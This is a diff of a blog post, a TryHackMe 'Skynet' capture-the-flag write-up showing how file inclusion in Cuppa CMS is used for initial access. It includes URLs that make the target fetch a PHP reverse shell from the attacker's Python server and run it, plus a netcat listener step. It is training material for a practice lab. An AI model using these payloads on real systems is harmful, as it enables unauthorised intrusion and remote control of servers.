RalphDesmangles/ralphdesmangles.github.io/_posts/2020-08-26-TryHackMe-Skynet-Writeup.md

 ## Initial Access / User
 A `searchsploit` search reveals that Cuppa CMS has a [Local/Remote File Inclusion Vulnerability](https://www.exploit-db.com/exploits/25971) which we can exploit, to gain a reverse shell.

 ![](/assets/images/thm-skynet/searchsploit.png)

-To set this up all we have to do is start a python server hosting in our directory that has our shell, then manipulate the `urlConfig` Parameter to point towards the PHP reverse shell.
+To set this up all we have to do is start a simple python http server in the directory that has our shell, then manipulate the vulnerable `urlConfig` Parameter to point towards our PHP reverse shell code.
 Once our reverse shell has been uploaded.
 Setup a netcat listener so we can gain a stable shell.

+URL to execute RFI Vulnerability:
 ```
 http://10.10.156.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.12.92/shell.php?
 ```

+Let's check our python http server to see if we got a response.
 ![](/assets/images/thm-skynet/rfi.png)
 Now that we know our PHP code is on the machine, let's setup a listener and execute the script and gain a reverse shell.

+URL to execute LFI Vulnerability:
 ```
 http://10.10.156.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=shell.php
 ```